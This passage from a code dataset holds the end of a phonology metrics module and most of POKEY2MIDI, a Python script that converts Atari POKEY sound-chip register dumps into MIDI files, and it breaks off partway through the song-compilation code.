or is_CV_syllable:\n syllables += 1\n\n return syllables\n\n\ndef number_of_consonant_clusters(word):\n '''Given a word, compute the number of consonant clusters it contains.'''\n cluster_rule = {'before': {'positive': ['consonantal']},\n 'conditions': {'positive': ['consonantal']},\n 'after': {'negative': ['consonantal']}}\n\n return len([index for index in range(len(word.segments))\n if word.index_applicable(index, cluster_rule)])\n\n\ndef word_complexity_measure(word):\n '''Given a word, compute the Word Complexity Measure outlined by Carol\n Stoel-Gammon in \"The Word Complexity Measure: Description and application\n to developmental phonology and disorders\" (2010).\n\n '''\n WCM_score = 0\n\n if number_of_syllables(word) > 2:\n WCM_score += 1\n\n if 'consonantal' in word.segments[-1].positive:\n WCM_score += 1\n\n WCM_score += number_of_consonant_clusters(word)\n\n for segment in word.segments:\n if segment.meets_conditions(VELAR[1]):\n WCM_score += 1\n elif segment.meets_conditions(LIQUID):\n WCM_score += 1\n elif segment.meets_conditions(RHOTIC_VOWEL):\n WCM_score += 1\n elif segment.meets_conditions(FRICATIVE_OR_AFFRICATE):\n WCM_score += 1\n if segment.meets_conditions(VOICED):\n WCM_score += 1\n\n return WCM_score\n\n\ndef random_value(word):\n '''Given a word, return a random value.'''\n return random()\n","repo_name":"kdelwat/Onset","sub_path":"engine/metrics.py","file_name":"metrics.py","file_ext":"py","file_size_in_byte":5121,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"31"} +{"seq_id":"41650516058","text":"'''\n\tPOKEY2MIDI v0.86\n\tby LucasVB (http://1ucasvb.com/)\n\t\n\tDescription:\n\t\tThis program converts POKEY data dumps from asapscan into MIDI files\n\t\tasapscan is part of the ASAP (Another Slight Atari Player) software package\n\t\n\tASAP site: http://asap.sourceforge.net\n\tFor usage, run: python pokey2midi -h\n\t\n\t-------\n\t\n\tTODO:\n\t\tPercussion maps\n\t\t\tDoesn't seem to be working on Sweet, considering the old MIDI\n\t\t\tSome weird poly 0? 
seems to be ignored\n\t\t\tAny song with Poly 2 & 3?\n\t\tPerhaps use helicopter/seashore instead?\n\t\tVerify 16-bit\n\t\t\n\t\tHandle poly periods properly, check emulator\n\t\tVerify highpass behavior\n\t\t\n\t\tMap noise poly to GM instruments\n\t\t\tMight need to fine-tune frequency range?\n\t\t\tWhat about percussions?\n\t\t\n\t\tOption to ignore all volume information and merge notes maximally?\n\t\t\n\t\tSuppress duplicate channels?\n\t\t\tIf channels have the exact same content, kill duplicates\n\t\t\tHelps with cleanup\n'''\n\nimport os\nimport re\nimport bz2\nimport math\nimport struct\nimport argparse\nimport mimetypes\n\n# Constants\nVERSION\t\t\t\t= \"0.85\"\nNTSC\t\t\t\t= 0\nPAL\t\t\t\t\t= 1\nNOTES\t\t\t\t= ['A','A#','B','C','C#','D','D#','E','F','F#','G','G#']\nDT_NTSC\t\t\t\t= 262 * 114 / 1789772.5 # time between NTSC frames\nDT_PAL\t\t\t\t= 312 * 114 / 1773447.0 # time between PAL frames\nFPS_NTSC\t\t\t= 59.94\nFPS_PAL\t\t\t\t= 50\n\n# Settings\nDEFAULT_TIMEBASE \t= 480\nDEFAULT_TEMPO \t\t= 60\nBPM_COUNT_THRESHOLD\t= 20 # Minimum number of intervals to run tempo detector\nBPM_NOTE_THRESHOLD\t= 60 # 60 = Middle C\nFPB_LIMITS\t\t\t= [10,100] # frames per beat (300 to 30 bpm)\n\n# Debug contants\nENABLE_16BIT\t\t= True # Enable 16bit?\nDEBUG\t\t\t\t= False # Internal debug\nDEBUG_POLYS\t\t\t= False # Also write non-tonal polys (0-4) notes as given by AUDF\n\n# TODO: find the rest\n# 0 = white noise, cymbal?\n# 2 = low buzz when high freq, helicopter for low freq?\n# 4 = pink noise, seashore?\n# Use negative values for percussion map? (MIDI channel 9)\nPOLY_INSTRUMENT\t\t= [0,0,0,0,0,80,81,80]\n\n# Human-readable POKEY state and other goodies\nclass POKEY(object):\n\tdef __init__(self, number, mode):\n\t\tself.mode = mode\n\t\t# Per-channel data\n\t\tself.audf\t\t\t= [0,0,0,0] # channel frequency data\n\t\tself.vol\t\t\t= [0,0,0,0] # channel volumes\n\t\tself.volctrl\t\t= [0,0,0,0] # volume-only mode (used for PCM digital audio)\n\t\tself.poly\t\t\t= [0,0,0,0] # channel polynomial counter data\n\t\t# AUDCTL flags\n\t\tself.use15khz\t\t= False\n\t\tself.highpass2w4\t= False\n\t\tself.highpass1w3\t= False\n\t\tself.join4and3\t\t= False\n\t\tself.join2and1\t\t= False\n\t\tself.clock3mhz\t\t= False\n\t\tself.clock1mhz\t\t= False\n\t\tself.poly17as9\t\t= False\n\t\t\n\t\tself._state\t\t= dict() # internal state\n\t\tself.number\t\t= number # POKEY number\n\t\n\t\t\n\t# The availalbe clock frquencies in Hz\n\t@property\n\tdef CLOCK_MHz(self):\n\t\treturn 1789772.5 if self.mode == NTSC else 1773447.0\n\t\n\t@property\n\tdef CLOCK_64kHz(self): # TODO: verify these PAL values\n\t\treturn 63921.0 if self.mode == NTSC else 63921.0\n\t\n\t@property\n\tdef CLOCK_15kHz(self): # TODO: verify these PAL values\n\t\treturn 15699.9 if self.mode == NTSC else 15699.0\n\t\n\tdef write(self, data): # Write data to POKEY chip\n\t\tself.writeAUDF(1, data[0])\n\t\tself.writeAUDC(1, data[1])\n\t\tself.writeAUDF(2, data[2])\n\t\tself.writeAUDC(2, data[3])\n\t\tself.writeAUDF(3, data[4])\n\t\tself.writeAUDC(3, data[5])\n\t\tself.writeAUDF(4, data[6])\n\t\tself.writeAUDC(4, data[7])\n\t\tself.writeAUDCTL(data[8])\n\t\n\tdef writeAUDC(self, ch, data):\n\t\tassert ch > 0\n\t\tself.vol[ch-1]\t\t= data & 0b00001111 # 4-bit channel volume\n\t\tself.volctrl[ch-1]\t= data >> 4 & 1 # Volume Control only (for writing PCM)\n\t\tself.poly[ch-1]\t\t= data >> 5 # Poly\n\t\t# Note: Poly is meaningless if volctrl is on\n\t\t# Otherwise, they are:\n\t\t# 0=0b000\t17 Bit poly - 5 Bit poly - N\n\t\t# 1=0b001\t5 Bit poly - 
N - 2\n\t\t# 2=0b010\t4 Bit poly - 5 Bit poly - N\n\t\t# 3=0b011\t5 Bit poly - N - 2\n\t\t# 4=0b100\t17 Bit poly - N\n\t\t# 5=0b101\tPure Tone - N - 2\n\t\t# 6=0b110\t4 Bit poly - N\n\t\t# 7=0b111\tSame as #5 (Not documented)\n\t\t\n\tdef writeAUDF(self, ch, data):\n\t\tassert ch > 0\n\t\tself.audf[ch-1] = data\n\t\n\tdef writeAUDCTL(self, data):\n\t\tself.use15khz\t\t= data >> 0 & 1 # Use 15 kHz clock for all channels, instead of 64 kHz\n\t\tself.highpass2w4\t= data >> 1 & 1 # Highpass channel 2 with 4\n\t\tself.highpass1w3\t= data >> 2 & 1 # Highpass channel 1 with 3\n\t\tself.join4and3\t\t= data >> 3 & 1 # Clock channel 4 with 3 (instead of 64 kHz) (16-bit)\n\t\tself.join2and1\t\t= data >> 4 & 1 # Clock channel 2 with 1 (instead of 64 kHz) (16-bit)\n\t\tself.clock3mhz\t\t= data >> 5 & 1 # Clock channel 3 with 1.79 MHz, instead of 64 kHz\n\t\tself.clock1mhz\t\t= data >> 6 & 1 # Clock channel 1 with 1.79 MHz, instead of 64 kHz\n\t\tself.poly17as9\t\t= data >> 7 & 1 # 9-bit poly instead of 17-bit poly\n\t\t\n\t@property\n\tdef AUDCTLFeatures(self):\n\t\taudctl_features = set()\n\t\tif self.use15khz:\n\t\t\taudctl_features.add(\"15khz\")\n\t\tif self.highpass2w4:\n\t\t\taudctl_features.add(\"highpass2w4\")\n\t\tif self.highpass1w3:\n\t\t\taudctl_features.add(\"highpass1w3\")\n\t\tif self.join4and3:\n\t\t\taudctl_features.add(\"join4and3\")\n\t\tif self.join2and1:\n\t\t\taudctl_features.add(\"join2and1\")\n\t\tif self.clock3mhz:\n\t\t\taudctl_features.add(\"clock3mhz\")\n\t\tif self.clock1mhz:\n\t\t\taudctl_features.add(\"clock1mhz\")\n\t\tif self.poly17as9:\n\t\t\taudctl_features.add(\"poly17as9\")\n\t\treturn audctl_features\n\t\n\t@property\n\tdef clock(self): # current global clock, set by AUDCTL\n\t\treturn self.CLOCK_15kHz if self.use15khz else self.CLOCK_64kHz\n\t\n\t# Get the effective frequency for a channel. From the references docs:\n\t# The Normal formula for the output frequency is:\n\t# Fout = Fin /2N\n\t# where N = the binary number in the frequency register (AUDF), plus 1 (N=AUDF+1).\n\t# The Modified formula should be used when Fin = 1.79 MHz and a more exact result is desired\n\t# Fout = Fin /2(AUDF+M)\n\t# where \n\t# M = 4 if 8 bit counter (AUDCTL bit 3 or 4 = 0), \n\t# M = 7 if 16 bit counter (AUDCTL bit 3 or 4 = 1)\n\t#\n\t# The 1.79MHz (1.78979 MHz, to be exact) clock rate is required to obtain the full range of\n\t# output frequencies. The formula for determining output frequency is a little different:\n\t# F0 = F/(2*(AUDF + 7)). In this case, AUDF is the two-byte frequency register value.\n\t# The second register of the pair is the low order byte, either AUDF2 or AUDF4.\n\t# For example, to use 1049 as a divider with registers 1 and 2, we would POKE 4 in AUDF2\n\t# and 25 in AUDF1.\n\t#\n\t#\n\t# TODO: We don't really get the frequency from fin/N directly, actually. What we get\n\t# is the frequency of the pure tone. 
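\n\t#\n\t# Added worked example (illustrative, not in the original source): with the\n\t# default 64 kHz clock, poly mode 5 (pure tone) and an 8-bit AUDF of 27, the\n\t# method below computes N = (27 + 1) * T_PURE = 56, so Fout = 63921 / 56 ~= 1141 Hz,\n\t# matching the manual's Fout = Fin / (2 * N) with N = AUDF + 1.\n\t# 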
Poly counters modify this to generate a timbre, so\n\t# we need to consider their timbre periods to get the proper frequency.\n\tdef getFrequency(self, ch):\n\t\tassert ch > 0\n\t\t\n\t\tif self.volctrl[ch-1]: # DC mode means no note available, has to be transcribed by hand!\n\t\t\treturn 0\n\t\t\n\t\t# Debug currently unhandled poly settings\n\t\t# Emulate frequencies so that the MIDI note number is the AUDF value for the channel\n\t\tif DEBUG_POLYS and self.poly[ch-1] not in [5,6,7]:\n\t\t\treturn 27.5 * math.pow(2,(self.audf[ch-1] - 21)/12)\n\t\t\n\t\t# TODO: For now only, we'll only handle possibly tonal sounds.\n\t\t# The noisier ones will have to be handled in a better way.\n\t\tif self.poly[ch-1] not in [5,6,7]:\n\t\t\treturn 27.5\n\t\t\n\t\t# TODO: figure out if the clock modifies fout of ch 4 and 2 or just 3 and 1\n\t\t# It's unclear if Fin is technically considered 1.79 MHz for 4/2 getting clocked with 3/1\n\t\t# if 3/1 are at 1.79 MHz\n\t\t# Test this on an emulator to figure out\n\t\t\n\t\tclock = self.clock # Current clock to be used\n\t\taudf = self.audf[ch-1] # register value to be used (8-bit or 16-bit)\n\t\tm = 1 # modifier value on the divide by N expression\n\t\t\n\t\t# 16-bit handling\n\t\tif ENABLE_16BIT:\n\t\t\t# TODO: Test this out on emulator, verify this logic\n\t\t\tif ch == 1:\n\t\t\t\tif self.join2and1: # Channel 1 is disabled if in 16-bit mode\n\t\t\t\t\treturn 0\n\t\t\t\telse: # If not joined with channel 2\n\t\t\t\t\tif self.clock1mhz: # We modify the clock, if necessary\n\t\t\t\t\t\tclock = self.CLOCK_MHz\n\t\t\t\t\t\tm = 7 # Modifier is 7\n\t\t\tif ch == 2:\n\t\t\t\tif self.join2and1: # Channel 2 is used for sound in 16-bit mode\n\t\t\t\t\t# Create 16-bit AUDF with 2 and 1\n\t\t\t\t\taudf = self.audf[1] * 256 + self.audf[0]\n\t\t\t\t\t# TODO: verify this on an emulator\n\t\t\t\t\tif self.clock1mhz: # If 1 is using the MHz clock, so will this\n\t\t\t\t\t\tclock = self.CLOCK_MHz\n\t\t\t\t\t\tm = 4\n\t\t\t\telse:\n\t\t\t\t\tpass\n\t\t\t# Do same for 3 and 4\n\t\t\tif ch == 3:\n\t\t\t\tif self.join4and3: # Channel 3 is disabled if in 16-bit mode\n\t\t\t\t\treturn 0\n\t\t\t\telse: # If not joined with channel 4\n\t\t\t\t\tif self.clock3mhz: # We modify the clock, if necessary\n\t\t\t\t\t\tclock = self.CLOCK_MHz\n\t\t\t\t\t\tm = 7 # Modifier is 7\n\t\t\tif ch == 4:\n\t\t\t\tif self.join4and3: # Channel 4 is used for sound in 16-bit mode\n\t\t\t\t\t# Create 16-bit AUDF with 4 and 3\n\t\t\t\t\taudf = self.audf[3] * 256 + self.audf[2]\n\t\t\t\t\tif self.clock3mhz: # If 3 is using the MHz clock, so will this (again, verify?)\n\t\t\t\t\t\tclock = self.CLOCK_MHz\n\t\t\t\t\t\tm = 4\n\t\t\t\telse:\n\t\t\t\t\tpass\n\t\t\n\t\t# Compute final frequency divider (for a half wave)\n\t\tN = (audf + m)\n\t\t\n\t\t# This isn't enough to get us the proper frequency, because N is actually the desired\n\t\t# period of repetition of half a waveform we're playing, generated by the polynonomial\n\t\t# counters. As such, different poly combinations will result in longer or shorter periods.\n\t\t# We must account for this. The periods of the polys are:\n\t\tT_POLY4 = 15\n\t\tT_POLY5 = 31\n\t\tT_POLY9 = 511\n\t\tT_POLY17 = 131071\n\t\tT_PURE = 2\n\t\t\n\t\t# TODO: Actually figure out how to map these noises to something more useful (percussions or\n\t\t# seashore/helicopter/drum instruments, etc)\n\t\t# 17 and 9 polys are basically noise, no need to count it properly as they have no\n\t\t# discernible frequency. 
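\n\t\t#\n\t\t# Added worked example (illustrative, not in the original source): with\n\t\t# channels 2+1 joined and clocked at 1.79 MHz, AUDF1 = 25 and AUDF2 = 4 give\n\t\t# the 16-bit value audf = 4 * 256 + 25 = 1049, so this method returns\n\t\t# Fout = 1789772.5 / ((1049 + 4) * 2) ~= 850 Hz, close to the manual's\n\t\t# F0 = F / (2 * (AUDF + 7)) ~= 847 Hz; the exact m constants are still\n\t\t# covered by the \"verify\" TODOs above.\n\t\t# 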
For now, we could assume some other period that maps most common\n\t\t# notes to the mid-range to be used later?\n\t\t# But that's not really useful, is it?\n\t\t\n\t\t# The periods of the 8 polys, given by the specifications (slightly modified)\n\t\t# TODO: Use emulator and figure out the exact frequencies obtained\n\t\t# It may be that the lowest bit being set adds a factor of 2 every time, with T_PURE = 1\n\t\tperiods = [\n\t\t\tT_POLY17 * T_POLY5, # 0=0b000\t17 Bit poly + 5 Bit poly = White noise\n\t\t\tT_POLY5, # 1=0b001\t5 Bit poly = Low tone\n\t\t\tT_POLY4 * T_POLY5, # 2=0b010\t4 Bit poly + 5 Bit poly = Low buzz tone\n\t\t\tT_POLY5, # 3=0b011\t5 Bit poly = Low tone (same as #1)\n\t\t\tT_POLY17, # 4=0b100\t17 Bit poly = Soft noise\n\t\t\tT_PURE, # 5=0b101\tPure Tone\n\t\t\tT_POLY4, # 6=0b110\t4 Bit poly - High buzz\n\t\t\tT_PURE # 7=0b111\tSame as #5 (Not documented)\n\t\t]\n\t\t\n\t\t# If AUDCTL is set to use a 9-bit poly instead of 17-bit, we change it\n\t\tif self.poly17as9:\n\t\t\tperiods[0] = T_POLY9 * T_POLY5\n\t\t\tperiods[4] = T_POLY9\n\t\t\n\t\t# TODO: Handle 0-4 which is basically noise. What to do about the 5-bit though?\n\t\t\n\t\t# Now, we multiply N by these periods to obtain the proper note corrected for timbre\n\t\tN *= periods[self.poly[ch-1]]\n\t\t\n\t\t# And return the final frequency\n\t\treturn clock / N\n\t\n\t# Get the nearest (piano) note on a channel given its tone frequency\n\t# Frequencies are exponential, so the note number is logarithmic\n\t# f = 27.5 * 2^(n/12) Hz <---> n = 12 * log2(f / 27.5)\n\t# Here, we defined n=0 -> A0, as in the piano. This is MIDI note 21\n\tdef getNote(self, ch):\n\t\tassert ch > 0\n\t\tfreq = self.getFrequency(ch)\n\t\tassert freq >= 0\n\t\t\n\t\tif freq <= 0: # Probably due to volctrl set or something else\n\t\t\treturn [None,None,0] # No note\n\t\t\n\t\t# Since the frequency division method is imprecise, we must figure out the proper\n\t\t# note heuristically. 
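(For example, freq = 440 Hz gives n = 12*log2(440/27.5) = 48, i.e. A4.)\n\t\t# 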
The real note we want is the standard note closest in frequency.\n\t\tn = math.log(freq / 27.5, 2)*12 # fractional note number (as in piano keys)\n\t\t# Since the frequency is exponential and not linear we must try both sides, low and high,\n\t\t# to see which is closer\n\t\tlf, hf = 27.5*math.pow(2, math.floor(n)/12), 27.5*math.pow(2, math.ceil(n)/12)\n\t\t# We use whichever note number gets us closest to a standard frequency\n\t\tif abs(freq-lf) < abs(freq-hf):\n\t\t\tnote = math.floor(n)\n\t\telse:\n\t\t\tnote = math.ceil(n)\n\t\t\n\t\t# if (note < -21 or note > 234) and self.vol[ch-1] > 0:\n\t\tif (note < -21 or note > 90) and self.vol[ch-1] > 0: # audible note far beyond the typical piano range\n\t\t\tif DEBUG:\n\t\t\t\tprint(\"\\nWarning: Couldn't handle audible note '%d' of POKEY %d, channel %d\" % (\n\t\t\t\t\tnote, self.number, ch\n\t\t\t\t))\n\t\t\t\terrstate = dict()\n\t\t\t\terrstate['audf']\t\t= list(self.audf)\n\t\t\t\terrstate['freqs']\t\t= list([\n\t\t\t\t\t\t\t\t\t\t\t\tself.getFrequency(1), self.getFrequency(2),\n\t\t\t\t\t\t\t\t\t\t\t\tself.getFrequency(3), self.getFrequency(4)\n\t\t\t\t\t\t\t\t\t\t\t])\n\t\t\t\terrstate['vol']\t\t\t= list(self.vol)\n\t\t\t\terrstate['volctrl']\t\t= list(self.volctrl)\n\t\t\t\terrstate['poly']\t\t= list(self.poly)\n\t\t\t\terrstate['use15khz']\t= self.use15khz\n\t\t\t\terrstate['highpass2w4']\t= self.highpass2w4\n\t\t\t\terrstate['highpass1w3']\t= self.highpass1w3\n\t\t\t\terrstate['join4and3']\t= self.join4and3\n\t\t\t\terrstate['join2and1']\t= self.join2and1\n\t\t\t\terrstate['clock3mhz']\t= self.clock3mhz\n\t\t\t\terrstate['clock1mhz']\t= self.clock1mhz\n\t\t\t\terrstate['poly17as9']\t= self.poly17as9\n\t\t\t\tprint(\"POKEY state:\", errstate)\n\t\t\treturn [None, None, 0]\n\t\t\n\t\t# TODO: export human-readable note names?\n\t\tnotename = NOTES[note % 12] + \"%d\" % ((note + 9) // 12) # human-readable name\n\t\treturn (note, notename, freq) # (piano key, note name, frequency)\n\t\n\t# Get current POKEY state in a human-readable form\n\t@property\n\tdef state(self):\n\t\t# Update current state\n\t\tself._state['audf']\t\t= list(self.audf)\n\t\tself._state['note']\t\t= list([\n\t\t\t\t\t\t\t\t\t\tself.getNote(1)[0], self.getNote(2)[0],\n\t\t\t\t\t\t\t\t\t\tself.getNote(3)[0], self.getNote(4)[0]\n\t\t\t\t\t\t\t\t\t])\n\t\tself._state['vol']\t\t\t= list(self.vol)\n\t\tself._state['volctrl']\t\t= list(self.volctrl)\n\t\tself._state['poly']\t\t\t= list(self.poly)\n\t\tself._state['use15khz']\t\t= self.use15khz\n\t\tself._state['highpass2w4']\t= self.highpass2w4\n\t\tself._state['highpass1w3']\t= self.highpass1w3\n\t\tself._state['join4and3']\t= self.join4and3\n\t\tself._state['join2and1']\t= self.join2and1\n\t\tself._state['clock3mhz']\t= self.clock3mhz\n\t\tself._state['clock1mhz']\t= self.clock1mhz\n\t\tself._state['poly17as9']\t= self.poly17as9\n\t\t\n\t\treturn self._state\n\n\n# Basic MIDI writing class\nclass MIDI(object):\n\tdef __init__(self, timebase=DEFAULT_TIMEBASE, tempo=DEFAULT_TEMPO):\n\t\tself.timebase = round(timebase/24)*24 # lock to multiples of 24, as is standard\n\t\tself.tempo = tempo\n\t\tself.tracks = []\n\t\tself.numNotes = [] # number of notes in each track\n\t\t\n\t\tself.timeOffset = 0 # time to subtract from every sound (note/ctrl) event, to remove silence\n\t\tself.scaleFactor = 1.0 # scale times by this factor, to adjust for a known tempo\n\t\t\n\t\t# Initialize conductor track, initially blank\n\t\tself.newTrack()\n\t\n\t# Writes variable length number, as per MIDI standard\n\tdef variableLengthNumber(self, 
num):\n\t\tassert num >= 0\n\t\tlst = struct.pack(\"=B\",num & 0x7f)\n\t\twhile 1:\n\t\t\tnum = num >> 7\n\t\t\tif num:\n\t\t\t\tlst = struct.pack(\"=B\",(num & 0x7f) | 0x80) + lst\n\t\t\telse:\n\t\t\t\treturn lst\n\t\n\t# Create a new MIDI track\n\tdef newTrack(self):\n\t\tself.tracks.append(dict())\n\t\tself.numNotes.append(0)\n\t\treturn len(self.tracks)-1\n\t\n\t# Add event to a MIDI track\n\t# time is given in seconds, data is a list with event name and data\n\t# ['Event name', data...]\n\t# We use a \"Raw\" event to write arbitrary data, instead of implementing all the useless events\n\tdef addEvent(self, track, time, data):\n\t\tassert 0 <= track and track < len(self.tracks)\n\t\tticks = self.timeToTicks(time)\n\t\tassert ticks >= 0\n\t\tif ticks not in self.tracks[track]:\n\t\t\tself.tracks[track][ticks] = []\n\t\tself.tracks[track][ticks].append( data )\n\t\n\t# Add meta track name\n\tdef setTrackName(self, track, name):\n\t\tself.addEvent(track, 0, [\n\t\t\t'Raw', b\"\\xFF\\x03\" + self.variableLengthNumber(len(name.encode())) + name.encode()\n\t\t])\n\t\n\t# Add meta instrument name\n\tdef setInstrumentName(self, track, name):\n\t\tself.addEvent(track, 0, [\n\t\t\t'Raw', b\"\\xFF\\x04\" + self.variableLengthNumber(len(name.encode())) + name.encode()\n\t\t])\n\t\n\t# Add a Note On event\n\tdef noteOn(self, track, time, channel, key, velocity):\n\t\tvelocity = min(127,max(0,int(velocity))) # Force 0-127 range\n\t\ttime -= self.timeOffset # Remove offset, if any\n\t\tself.addEvent( track, time, [\n\t\t\t'On', channel, key, velocity\n\t\t])\n\t\tself.numNotes[track] += 1\n\t\n\t# Add a Note Off event\n\tdef noteOff(self, track, time, channel, key):\n\t\t# Offs can be (and are usually) treated as On events with zero velocity\n\t\tself.noteOn(track, time, channel, key, 0)\n\t\n\t# Add a Controller Change event\n\tdef ctrlChange(self, track, time, channel, ctrl, value):\n\t\ttime -= self.timeOffset\n\t\tself.addEvent( track, time, [\n\t\t\t'Ctrl', channel, ctrl, value\n\t\t])\n\t\n\t# Add a Program (Instrument) Change event\n\tdef progChange(self, track, time, channel, inst):\n\t\ttime -= self.timeOffset\n\t\tself.addEvent( track, time, [\n\t\t\t'Prog', channel, inst\n\t\t])\n\t\n\t# Convert time in seconds to MIDI ticks\n\tdef timeToTicks(self, time):\n\t\treturn round( time * self.timebase * self.scaleFactor )\n\t\n\tdef filterNotesByLength(self, cutoff):\n\t\tprint(\"Marking notes shorter than 1/%d of a beat...\" % (1.0/cutoff))\n\t\tnotes = {} # current notes being played in each channel\n\t\tfiltered = [] # notes to filter\n\t\tfor tn, track in enumerate(self.tracks): # for each track\n\t\t\tfor t in sorted(track.keys()): # we go through the timestamps\n\t\t\t\tfor en, ev in enumerate(track[t]): # and each of their events\n\t\t\t\t\tif ev[0] != \"On\": continue # we only care about Note On events\n\t\t\t\t\t_, ch, key, vel = ev\n\t\t\t\t\tif vel > 0: # NoteOn triggered\n\t\t\t\t\t\tif (ch,key) not in notes: # If not a previously active note, mark it as active\n\t\t\t\t\t\t\tnotes[(ch,key)] = (t,ev) # save its track & event\n\t\t\t\t\telse: # Otherwise, we have a NoteOff\n\t\t\t\t\t\t# We now check for the length of the note\n\t\t\t\t\t\tif (ch,key) in notes: # If it was previously active (we check just in case)\n\t\t\t\t\t\t\t# Grab info about where it began\n\t\t\t\t\t\t\tstarttime, starten = notes[(ch,key)]\n\t\t\t\t\t\t\tdur = t - starttime # compute duration (in MIDI ticks)\n\t\t\t\t\t\t\tif (dur / self.timebase) < cutoff: # If duration lower than the cutoff, we filter 
it\n\t\t\t\t\t\t\t\t# We append the track number, the NoteOn info and the NoteOff info\n\t\t\t\t\t\t\t\tfiltered.append([\n\t\t\t\t\t\t\t\t\ttn,\n\t\t\t\t\t\t\t\t\tnotes[(ch,key)],\n\t\t\t\t\t\t\t\t\t(t,ev)\n\t\t\t\t\t\t\t\t])\n\t\t\t\t\t\t\tdel notes[(ch,key)]\n\t\t\t\t\t\t# else:\n\t\t\t\t\t\t\t#print(\"Invalid off note found.\")\n\t\t\t\t\t\t\t#exit()\n\t\t# We now have a list of notes to filter\n\t\tprint(\"%d note%s filtered\" % (len(filtered), \"s\" if len(filtered) != 0 else \"\"))\n\t\tfor note in filtered: # We switch channel for these very short notes\n\t\t\ttn, non, noff = note\n\t\t\t\n\t\t\tself.tracks[tn][non[0]].remove(non[1]) # remove NoteOn event\n\t\t\tnon[1][1] += 8 # tweak channel\n\t\t\t# if non[1][1] >= 9: # skip percussion MIDI channel\n\t\t\t\t# non[1][1] += 1\n\t\t\tself.tracks[tn][non[0]].append(non[1]) # append tweaked NoteOn event\n\t\t\t\n\t\t\t# Do the same with the NoteOff\n\t\t\tself.tracks[tn][noff[0]].remove(noff[1])\n\t\t\tnoff[1][1] += 8\n\t\t\t# if noff[1][1] >= 9:\n\t\t\t\t# noff[1][1] += 1 # skip percussion\n\t\t\tself.tracks[tn][noff[0]].append(noff[1])\n\t\t\t\n\t\n\t# Save MIDI to a path\n\tdef save(self, path):\n\t\t# Assemble conductor track, track 0, which must contain only meta events\n\t\tself.tracks[0] = dict()\n\t\tself.addEvent(0, 0, [\n\t\t\t'Raw', b\"\\xFF\\x51\\x03\" + struct.pack(\">L\",int(60e6/self.tempo))[1:]\n\t\t])\n\t\t\n\t\t# Watermark\n\t\tself.setTrackName(\n\t\t\t0,\n\t\t\t\"Converted with POKEY2MIDI v%s by LucasVB (http://1ucasvb.com/)\" % VERSION\n\t\t) \n\t\t\n\t\t# Only write non-empty tracks\n\t\ttracks = [self.tracks[0]] + [\n\t\t\ttrack for t, track in enumerate(self.tracks) if self.numNotes[t] > 0\n\t\t]\n\t\t\n\t\t# Write MIDI file to disk\n\t\twith open(path, \"wb\") as mf:\n\t\t\tmf.write(b\"MThd\") # header\n\t\t\tmf.write(struct.pack(\">L\", 6)) # header length\n\t\t\tmf.write(struct.pack(\">H\", 1)) # MIDI format 1 (multiple tracks, single sequence)\n\t\t\tmf.write(struct.pack(\">H\", len(tracks))) # num tracks + conductor track\n\t\t\tmf.write(struct.pack(\">H\", self.timebase)) # timebase\n\t\t\tfor track in tracks:\n\t\t\t\tmf.write(b\"MTrk\") # track header\n\t\t\t\tmf.write(struct.pack(\">L\", 0)) # track length (will overwrite later, further down)\n\t\t\t\ttrkpos = mf.tell() # save pos for the beginning of track data, we'll use it later\n\t\t\t\t# // begin track data\n\t\t\t\t\n\t\t\t\tltick = 0 # last tick\n\t\t\t\tticks = sorted(track.keys())\n\t\t\t\tfor tick in ticks:\n\t\t\t\t\tfirst = True # first event at this tick?\n\t\t\t\t\tfor ev in track[tick]:\n\t\t\t\t\t\tif first: # If first event at this tick, we use delta and update ltick\n\t\t\t\t\t\t\tdelta = tick - ltick\n\t\t\t\t\t\t\tfirst = False\n\t\t\t\t\t\telse: # Next events at this tick are simultaneous, so their deltas are zero\n\t\t\t\t\t\t\tdelta = 0\n\t\t\t\t\t\tif ev[0] == \"Raw\":\n\t\t\t\t\t\t\tmf.write(self.variableLengthNumber(delta))\n\t\t\t\t\t\t\tmf.write(ev[1])\n\t\t\t\t\t\tif ev[0] == \"On\":\n\t\t\t\t\t\t\tmf.write(self.variableLengthNumber(delta))\n\t\t\t\t\t\t\tchannel, key, velocity = ev[1:]\n\t\t\t\t\t\t\tmf.write(struct.pack(\"=B\", 0x90 + channel))\n\t\t\t\t\t\t\tmf.write(struct.pack(\"=B\", key))\n\t\t\t\t\t\t\tmf.write(struct.pack(\"=B\", velocity))\n\t\t\t\t\t\tif ev[0] == \"Ctrl\":\n\t\t\t\t\t\t\tmf.write(self.variableLengthNumber(delta))\n\t\t\t\t\t\t\tchannel, ctrl, val = ev[1:]\n\t\t\t\t\t\t\tmf.write(struct.pack(\"=B\", 0xB0 + channel))\n\t\t\t\t\t\t\tmf.write(struct.pack(\"=B\", ctrl))\n\t\t\t\t\t\t\tmf.write(struct.pack(\"=B\", val))\n\t\t\t\t\t\tif ev[0] == 
\"Prog\":\n\t\t\t\t\t\t\tmf.write(self.variableLengthNumber(delta))\n\t\t\t\t\t\t\tchannel, inst = ev[1:]\n\t\t\t\t\t\t\tmf.write(struct.pack(\"=B\", 0xC0 + channel))\n\t\t\t\t\t\t\tmf.write(struct.pack(\"=B\", inst))\n\t\t\t\t\tltick = tick\n\t\t\t\t\t\n\t\t\t\t# // end generated track data\n\t\t\t\tmf.write(b\"\\x00\\xFF\\x2F\\x00\") # Obligatory End of Track marker\n\t\t\t\t# find total track size\n\t\t\t\ttrklen = mf.tell() - trkpos # find total chunk size\n\t\t\t\tmf.seek(trkpos - 4) # go back to track length data\n\t\t\t\tmf.write(struct.pack(\">L\", trklen)) # overwrite proper length\n\t\t\t\tmf.seek(trkpos + trklen) # go back to end of data chunk\n\n\n# Song management class\n# This is the class that handles POKEY states as music, to later convert to MIDI\nclass Song(object):\n\tdef __init__(self, converter):\n\t\tself.pokeys = []\n\t\tself.states = dict()\n\t\tself.music = dict()\n\t\tself.converter = converter\n\t\n\t@property\n\tdef numPOKEY(self):\n\t\treturn len(self.pokeys)\n\t\n\t# Initializes POKEYs\n\tdef initPOKEY(self, n, mode):\n\t\tself.pokeys = [POKEY(pn, mode) for pn in range(n)]\n\t\n\t# Add a new POKEY state\n\tdef addState(self, t, data):\n\t\tself.states[t] = data\n\t\n\t# Compile POKEY states into timed note information and so on\n\tdef compile(self):\n\t\tmusic = dict()\n\t\tvoices = set() # voices are different timbres at each channel and POKEY\n\t\tfeatures = set() # AUDCTL features used\n\t\tearliest_sound = 1e6 # just some big number, simplifies logic\n\t\ttotal = len(self.states)\n\t\tlpc = None # last percentage\n\t\tprint(\"Compiling song...\")\n\t\tfor n, t in enumerate(self.states):\n\t\t\tdata = 